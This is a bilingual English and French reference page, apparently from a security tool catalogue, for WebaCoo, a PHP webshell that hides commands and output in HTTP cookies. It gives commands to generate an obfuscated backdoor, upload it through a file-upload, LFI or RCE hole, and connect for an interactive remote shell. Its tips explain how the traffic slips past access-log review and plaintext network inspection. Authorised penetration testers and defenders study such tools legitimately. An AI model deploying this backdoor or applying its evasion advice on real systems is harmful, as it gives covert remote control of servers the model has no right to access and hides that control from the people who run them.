WebaCoo

Webshell PHP furtif qui communique via des cookies HTTP plutôt que le corps de la requête, échappant à certaines détections basées sur les logs. Stealthy PHP webshell that communicates via HTTP cookies rather than the request body, evading some log-based detection.

↗ https://github.com/anestisb/webacoo

Overview

WebaCoo (Web Backdoor Cookie) is a small PHP webshell built to be harder to spot in logs and casual inspection: instead of passing commands and output through visible POST/GET parameters, it hides them inside HTTP cookies, and its payload is obfuscated. It ships with a client script that handles the cookie encoding/decoding, giving an interactive-feeling shell over what looks like ordinary cookie traffic.

Common Usage

Generate an obfuscated PHP backdoor payload to upload to the target

webacoo -g -o backdoor.php

Connect to an already-deployed backdoor and get an interactive shell

webacoo -t -u http://target.com/uploads/backdoor.php

Run a single command non-interactively

webacoo -t -u http://target.com/uploads/backdoor.php -c "id"

Route the connection through a proxy (e.g. Burp for inspection)

webacoo -t -u http://target.com/uploads/backdoor.php -p 127.0.0.1:8080

Deployment Workflow

  1. Generate the obfuscated payload
webacoo -g -o shell.php
# 2. Upload shell.php via whatever upload/LFI/RCE vector was found
#    (file upload form, webdav, etc.)
  1. Connect back to it as a client
webacoo -t -u http://target.com/images/shell.php
# 4. Interact — commands and output travel inside Cookie headers,
#    blending in with normal-looking HTTP traffic in access logs

Tips

  • Since command/output data rides in cookies, it won’t show up in the request body or URL — a plain access-log review is far less likely to flag it than a typical cmd= webshell.
  • Still detectable by WAFs/EDR that inspect cookie contents or by anomaly detection on cookie size/entropy.
  • Combine with HTTPS deployment (upload over TLS) to also defeat plaintext network inspection.
Help / Man page
webacoo [options]

  -g              Generate backdoor payload
  -o FILE          Output file for generated payload
  -t              Terminal/client mode — connect to a deployed backdoor
  -u URL           URL of the deployed backdoor
  -c CMD           Run a single command non-interactively
  -p HOST:PORT     Proxy to route requests through
  -f FILE          Load command list from file
  -v               Verbose output
  -h               Show help

Vue d’ensemble

WebaCoo (Web Backdoor Cookie) est un petit webshell PHP conçu pour être difficile à repérer dans les logs et lors d’une inspection rapide : au lieu de faire passer les commandes et la sortie par des paramètres POST/GET visibles, il les cache dans des cookies HTTP, et son payload est obfusqué. Il est fourni avec un script client qui gère l’encodage/décodage des cookies, offrant un shell à l’apparence interactive au-dessus de ce qui ressemble à du trafic de cookies ordinaire.

Utilisation courante

# Générer un payload de backdoor PHP obfusqué à téléverser sur la cible
webacoo -g -o backdoor.php

# Se connecter à une backdoor déjà déployée et obtenir un shell interactif
webacoo -t -u http://target.com/uploads/backdoor.php

# Exécuter une seule commande de façon non interactive
webacoo -t -u http://target.com/uploads/backdoor.php -c "id"

# Router la connexion via un proxy (par exemple Burp pour inspection)
webacoo -t -u http://target.com/uploads/backdoor.php -p 127.0.0.1:8080

Flux de déploiement

# 1. Générer le payload obfusqué
webacoo -g -o shell.php

# 2. Téléverser shell.php via le vecteur d'upload/LFI/RCE trouvé
#    (formulaire d'upload de fichier, webdav, etc.)

# 3. S'y reconnecter en tant que client
webacoo -t -u http://target.com/images/shell.php

# 4. Interagir : les commandes et la sortie transitent dans les en-têtes Cookie,
#    se fondant dans un trafic HTTP d'apparence normale dans les logs d'accès

Conseils

  • Comme les données de commande/sortie voyagent dans les cookies, elles n’apparaissent ni dans le corps de la requête ni dans l’URL : une simple revue des logs d’accès a beaucoup moins de chances de le détecter qu’un webshell classique en cmd=.
  • Toujours détectable par les WAF/EDR qui inspectent le contenu des cookies ou par une détection d’anomalie sur la taille/l’entropie des cookies.
  • Combiner avec un déploiement en HTTPS (upload via TLS) pour aussi déjouer l’inspection réseau en clair.
Aide / Page de manuel
webacoo [options]

  -g              Generate backdoor payload
  -o FILE          Output file for generated payload
  -t              Terminal/client mode — connect to a deployed backdoor
  -u URL           URL of the deployed backdoor
  -c CMD           Run a single command non-interactively
  -p HOST:PORT     Proxy to route requests through
  -f FILE          Load command list from file
  -v               Verbose output
  -h               Show help